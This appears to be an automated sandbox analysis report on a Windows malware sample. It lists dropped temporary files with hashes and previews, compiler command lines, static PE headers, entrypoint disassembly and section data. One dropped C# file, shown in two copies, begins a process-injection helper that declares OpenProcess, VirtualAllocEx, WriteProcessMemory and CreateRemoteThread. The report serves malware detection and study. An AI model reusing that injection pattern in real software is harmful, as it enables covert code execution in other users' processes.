                                Preview:L... k.g.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........J....c:\Users\user\AppData\Local\Temp\CSCD0EB64BB52C94309A29EE6B778E205.TMP.................1.k..*...`.............5.......C:\Users\user\AppData\Local\Temp\RESC35E.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.c.z.y.5.v.w.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

                                C:\Users\user\AppData\Local\Temp\RESDA71.tmp

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Mon Oct 28 10:44:54 2024, 1st section name ".debug$S"
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):3.97536365345198
                                Encrypted:false
                                SSDEEP:24:HJ5nW9BiTwuHBMwKdNII+ycuZhNMakS4PNnqShgd:pNsiTwuhTKdu1ulMa3AqSy
                                MD5:7470721E0F857F5C68E8E0155DF222EA
                                SHA1:8E7C205DDF7910E81F3C2825B3BB3A94A67B609D
                                SHA-256:0B4FD54E0929A5DAAF70FDEDE17555337EC84B140C69485119305E7B7BA77F88
                                SHA-512:C3A4CAA5E7FDC4CE384B64F9CB473233FCF3BAACD8576B25AFB3A237BA927E0EE063C27F21628437856A0DF214CA1E632351B9B64169C86A957402A0825D5EBC
                                Malicious:false
                                Preview:L...&k.g.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........L....c:\Users\user\AppData\Local\Temp\CSC30DB8E40DC954A908A17CE354256952F.TMP................8......62...b@V..........5.......C:\Users\user\AppData\Local\Temp\RESDA71.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.p.o.x.i.y.r.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20l5d1go.eci.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4hbdnfi4.qe2.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0crx5dw.v3i.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgf4ne14.mal.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\iczy5vwk.0.cs

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1170
                                Entropy (8bit):5.064767530463548
                                Encrypted:false
                                SSDEEP:24:JoCtK4uI5mZTz7sV+MfwztLqtsmPyLuw9g3HsTxC:JoCtK4uI5MTz7sUMfitmbouw9goxC
                                MD5:3FA19360E09832C3D711D4FE71911EAE
                                SHA1:55A86C45AF0F33419DB93C39AAAE09A06F610C78
                                SHA-256:92A6B697B5BC2E42C280074823E06C1F39EFC36FD985FEFF938B4F071756D28B
                                SHA-512:880ABC257E440799CBC718B39D776127E2A683CB5FFE4EBE426240AA52D7FBF6A4982B66B536388A88B00ED810088DC80B47E94297D24DB89C1E2A92C982EC84
                                Malicious:false
                                Preview:.using System;..using System.Runtime.InteropServices;....public class WinAPI..{.. [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr OpenProcess(int processAccess, bool bInheritHandle, uint processId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, ref IntPtr lpThreadId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool CloseHandle(In

                                C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (350), with no line terminators
                                Category:dropped
                                Size (bytes):353
                                Entropy (8bit):5.256730866133055
                                Encrypted:false
                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fjX+zxs7+AEszI923fjDn:p37Lvkmb6Kzj+WZE2vn
                                MD5:C2182BFA36D7CD7CEF71798DF91327D5
                                SHA1:E9AE3033B9276FE770993BD68B5C2611B90CE2C3
                                SHA-256:DB035C6D211FEBD58420CC138F9B79241D17D6385A95711D5977AEB071247261
                                SHA-512:F36585540D9A4913AE5C404BE276877D82EDEF754668D3959A37148CF46B47E4DBD85B63266FCC4CE553BFE09E9827B1A7E4ED8B2E459C85A825021B9B9E74F7
                                Malicious:true
                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iczy5vwk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iczy5vwk.0.cs"

                                C:\Users\user\AppData\Local\Temp\iczy5vwk.dll

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):4096
                                Entropy (8bit):3.065497817114651
                                Encrypted:false
                                SSDEEP:48:6oD7rXuQ/VV7mkuzzNMuJi37vY81ulqa3+q:Br+QLdY/8K
                                MD5:680F6AF67C0020F96BA7BC571689535F
                                SHA1:90E3D51012955BE211378FE78B6FD84AC393CFDF
                                SHA-256:4A2A76DDCB8A3A7275E425978EC115481A79C3B4CEE09C180F4DFA4B59F50E82
                                SHA-512:C24E819EC2997E07A74B3B64D877FA5CB968B19D941B203FC387A51372441FE0CFF70741B473DA134A9B1CD21CD6B10FFC2F92ECCB21BBA4CE9ED1CE084D6537
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... k.g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l.......#~..h...P...#Strings............#US.........#GUID...........#Blob...........W.........%3......................................................................'...............0...............................V.5...V.H...V.S.......... j............ v.&.......... ../.......... ..:.......... ..F...P ........K.......................................................

                                C:\Users\user\AppData\Local\Temp\iczy5vwk.out

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (429), with CRLF, CR line terminators
                                Category:modified
                                Size (bytes):850
                                Entropy (8bit):5.318659619210777
                                Encrypted:false
                                SSDEEP:24:AId3ka6KzrE2vuKax5DqBVKVrdFAMBJTH:Akka6arE2vuK2DcVKdBJj
                                MD5:CB9CC360F610636068C4F823068D558D
                                SHA1:7C50F9C57B76519B79BDE4C5C23085463960C996
                                SHA-256:2776CC038C5F104B0D9BC1858A9D0C33092276FF589ECCC47E99C3A88D42F40B
                                SHA-512:8EE02A2AE6E6B44C5CAD608C767904827E1EBEB5A4407D7D1BE632BF1164FD6AD6E26FD7E631092CF4B39BCDCC71A80F3E0F2CA337D2458F9F9B370945AB61DD
                                Malicious:false
                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iczy5vwk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iczy5vwk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                C:\Users\user\AppData\Local\Temp\spoxiyrj.0.cs

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1170
                                Entropy (8bit):5.064767530463548
                                Encrypted:false
                                SSDEEP:24:JoCtK4uI5mZTz7sV+MfwztLqtsmPyLuw9g3HsTxC:JoCtK4uI5MTz7sUMfitmbouw9goxC
                                MD5:3FA19360E09832C3D711D4FE71911EAE
                                SHA1:55A86C45AF0F33419DB93C39AAAE09A06F610C78
                                SHA-256:92A6B697B5BC2E42C280074823E06C1F39EFC36FD985FEFF938B4F071756D28B
                                SHA-512:880ABC257E440799CBC718B39D776127E2A683CB5FFE4EBE426240AA52D7FBF6A4982B66B536388A88B00ED810088DC80B47E94297D24DB89C1E2A92C982EC84
                                Malicious:false
                                Preview:.using System;..using System.Runtime.InteropServices;....public class WinAPI..{.. [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr OpenProcess(int processAccess, bool bInheritHandle, uint processId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, ref IntPtr lpThreadId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool CloseHandle(In

                                C:\Users\user\AppData\Local\Temp\spoxiyrj.cmdline

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (350), with no line terminators
                                Category:dropped
                                Size (bytes):353
                                Entropy (8bit):5.218933603171431
                                Encrypted:false
                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f30zxs7+AEszI923fB:p37Lvkmb6KzP0WZE2J
                                MD5:7D50223B3619196D169AE176B618A672
                                SHA1:382632CD34394735093AE9312FF282F55E26D2BF
                                SHA-256:5FEF7529EDC8DC8636405307BEA24E205FBF9414FD5096883EAC2D6169F8FAEE
                                SHA-512:D7D7A42D93FEBED34786CB08F7513F0C4E22AF312CB2D7D92508FAC3A6FE1CE1FDA4A98B95475087C1099774ED0A3568F4B0B0DA7210928ADC244C1B9AC6031E
                                Malicious:false
                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\spoxiyrj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\spoxiyrj.0.cs"

                                C:\Users\user\AppData\Local\Temp\spoxiyrj.dll

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):4096
                                Entropy (8bit):3.0589816265846963
                                Encrypted:false
                                SSDEEP:48:6XiD7rXuQ/fV7mkuzzNMuJk7MY81ulMa3Aq:3r+Q1gY/6K
                                MD5:47DEB890CB61D0EF63375F98A3D47E43
                                SHA1:1778C80E06EE5F4C0B0EA92628272C531E6489AC
                                SHA-256:38F49237636DE946368A354DF2605FD5902E42306D597D91421B807109141886
                                SHA-512:A3302DA6DB2BBABDD79BF9D548487410AE93E00B3EE74B85200CEE6E6B6AF7E36F27214E6BA4FB1C95E12BA1C33262963B7B553431BC56C546FC49933585CC32
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&k.g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l.......#~..h...P...#Strings............#US.........#GUID...........#Blob...........W.........%3......................................................................'...............0...............................V.5...V.H...V.S.......... j............ v.&.......... ../.......... ..:.......... ..F...P ........K.......................................................

                                C:\Users\user\AppData\Local\Temp\spoxiyrj.out

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (429), with CRLF, CR line terminators
                                Category:modified
                                Size (bytes):850
                                Entropy (8bit):5.307069615205582
                                Encrypted:false
                                SSDEEP:12:xKIR37Lvkmb6KzP0WZE2MKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KzdE2MKax5DqBVKVrdFAMBJTH
                                MD5:ED5C22BBB091A38AA95AA6B1EC62A626
                                SHA1:8D81BCE9D070EF25C86DB2D025A4A6C4761AF121
                                SHA-256:CFBB22376DF4F3042F0346FF60663CFF09129B10C0E9B1BC179622B2BB217410
                                SHA-512:D5422BAA35F907981886AD4B3F055B236969B6155969E8B21B92EA61A9851643AE4A0E4279394EDC6B50B4BD212FA57BDA4C10DA41BD0C035D0368F92DCEFBC9
                                Malicious:false
                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\spoxiyrj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\spoxiyrj.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                C:\Windows\appcompat\Programs\Amcache.hve

                                Download File
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.422336430353071
                                Encrypted:false
                                SSDEEP:6144:uSvfpi6ceLP/9skLmb0OTdWSPHaJG8nAgeMZMMhA2fX4WABlEnNl0uhiTw:NvloTdW+EZMM6DFyP03w
                                MD5:70059ABC5DFEF0529B94B4F370A39D02
                                SHA1:55B45CDD7B12B29FDE9694824CCB9090513DE687
                                SHA-256:0950ABAFFB43F3525A3C3EEFB9B58BBC5A7D45EAB64C59F32554E511E0EF7962
                                SHA-512:1FB8478C3D8A0A9DC1386705DCEFF16B49F4FF14F4D840270E3140F07A06C5BBC97E78D62AF6D36B20F8E23A7155BBBE701615E3FD681DD7EF2C602B8BC8DE41
                                Malicious:false
                                Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.s...)..............................................................................................................................................................................................................................................................................................................................................E...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                Entropy (8bit):7.973818497491259
                                TrID:
                                • Win64 Executable GUI (202006/5) 92.65%
                                • Win64 Executable (generic) (12005/4) 5.51%
                                • Generic Win/DOS Executable (2004/3) 0.92%
                                • DOS Executable Generic (2002/1) 0.92%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                                File size:8'467'456 bytes
                                MD5:58819721cbc16ea7033be23e69bd2058
                                SHA1:77659fce36b96a2b0de0f7079e057fd711900887
                                SHA256:ff7d03accac70da489c7f108fa7d7d5fb58e02bcc32f4933ed418451663cc74a
                                SHA512:210127d72c1bf8986e720724d2881c861ed335469a904a6567ee7310b3501ca4a29f0d57a97a20b32f6ac9ccd1f48653ef27cb46e75df9348a16354a4d9e165f
                                SSDEEP:196608:VDJEXA2kauB2cZGgCgdjZeakFao8FaPsCsCDCRo0bxjU/vHjqjkrx:V0lkau8EG+UBCaUCnDCe0bG/vHZ
                                TLSH:6F862344354947FAF459E834057291A1E7B3BC269B22EB8B2790612FDF632F25F35322
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C!.B.@...@...@..L8...@..L8...@..L8...@.......@......=@......#@..L8...@..L8...@...@..n@.......@....[..@...@3..@.......@..Rich.@.

                                File Icon

                                Icon Hash:1f1d9d1d67661183

                                Static PE Info

                                General

                                Entrypoint:0x14002c154
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x140000000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Time Stamp:0x670E8C61 [Tue Oct 15 15:38:09 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:72a5ce0c0a3d6f27f94d6e1307a5a6d7

                                Entrypoint Preview

                                Instruction
                                dec eax
                                sub esp, 28h
                                call 00007F19F0D9E824h
                                dec eax
                                add esp, 28h
                                jmp 00007F19F0D9DE17h
                                int3
                                int3
                                dec eax
                                sub esp, 28h
                                dec ebp
                                mov eax, dword ptr [ecx+38h]
                                dec eax
                                mov ecx, edx
                                dec ecx
                                mov edx, ecx
                                call 00007F19F0D9DFA2h
                                mov eax, 00000001h
                                dec eax
                                add esp, 28h
                                ret
                                int3
                                int3
                                int3
                                inc eax
                                push ebx
                                inc ebp
                                mov ebx, dword ptr [eax]
                                dec eax
                                mov ebx, edx
                                inc ecx
                                and ebx, FFFFFFF8h
                                dec esp
                                mov ecx, ecx
                                inc ecx
                                test byte ptr [eax], 00000004h
                                dec esp
                                mov edx, ecx
                                je 00007F19F0D9DFA5h
                                inc ecx
                                mov eax, dword ptr [eax+08h]
                                dec ebp
                                arpl word ptr [eax+04h], dx
                                neg eax
                                dec esp
                                add edx, ecx
                                dec eax
                                arpl ax, cx
                                dec esp
                                and edx, ecx
                                dec ecx
                                arpl bx, ax
                                dec edx
                                mov edx, dword ptr [eax+edx]
                                dec eax
                                mov eax, dword ptr [ebx+10h]
                                mov ecx, dword ptr [eax+08h]
                                dec eax
                                add ecx, dword ptr [ebx+08h]
                                test byte ptr [ecx+03h], 0000000Fh
                                je 00007F19F0D9DF9Ch
                                movzx eax, byte ptr [ecx+03h]
                                and eax, FFFFFFF0h
                                dec esp
                                add ecx, eax
                                dec esp
                                xor ecx, edx
                                dec ecx
                                mov ecx, ecx
                                pop ebx
                                jmp 00007F19F0D9D664h
                                int3
                                int3
                                int3
                                dec eax
                                mov eax, esp
                                dec eax
                                mov dword ptr [eax+08h], ebx
                                dec eax
                                mov dword ptr [eax+10h], ebp
                                dec eax
                                mov dword ptr [eax+18h], esi
                                dec eax
                                mov dword ptr [eax+20h], edi
                                inc ecx
                                push esi
                                dec eax
                                sub esp, 20h
                                dec ecx
                                mov ebx, dword ptr [ecx+38h]
                                dec eax
                                mov esi, edx
                                dec ebp
                                mov esi, eax
                                dec eax
                                mov ebp, ecx
                                dec ecx
                                mov edx, ecx
                                dec eax
                                mov ecx, esi
                                dec ecx
                                mov edi, ecx
                                dec esp
                                lea eax, dword ptr [ebx+04h]
                                call 00007F19F0D9DF01h

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x75bdc0x50.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x850000x79424c.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x7b0000x39e4.pdata
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x81a0000x1120.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x6b2100x70.rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x6b3800x28.rdata
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6b2800x94.rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x560000x318.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x545dc0x54600e0fb476963c61d79a0e4d1f8cdda2680False0.47759259259259257data6.521391194972824IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x560000x2064c0x20800f8856360932ec81157aa09db5dbf2e4fFalse0.3951021634615385data4.828411829352243IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x770000x386c0x20001e366a8d51f484097e110da8aba0457aFalse0.15283203125DOS executable (block device driver)3.627166240806781IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .pdata0x7b0000x39e40x3a007de2ca4768d13ee483f167eda17087b8False0.49986530172413796data5.743669795175902IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .gfids0x7f0000x7880x8005a004955d5c5111a6a2d62a167881cbeFalse0.34228515625data3.590485572918061IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .tls0x800000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .gxfg0x810000x24500x2600dba415d40ec4ebcadeadeedd849c281fFalse0.42465049342105265data5.029209810777076IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .gehcont0x840000x200x20082ab971502982c7237d57054e6561745False0.064453125data0.16299007530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .rsrc0x850000x79424c0x794400396d6234ba00d269a108f1c9cf01e0a7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x81a0000x11200x12006f89167d5e4b33c4dada7a557c7ba933False0.3630642361111111data5.348115706979858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0x853280x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.3581081081081081
                                RT_ICON0x854500x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.21676300578034682
                                RT_ICON0x859b80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.3467741935483871
                                RT_ICON0x85ca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.5388086642599278
                                RT_ICON0x865480x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.2603658536585366
                                RT_ICON0x86bb00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.47761194029850745
                                RT_ICON0x87a580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.22695035460992907
                                RT_ICON0x87ec00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4219043151969981
                                RT_ICON0x88f680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.30933609958506225
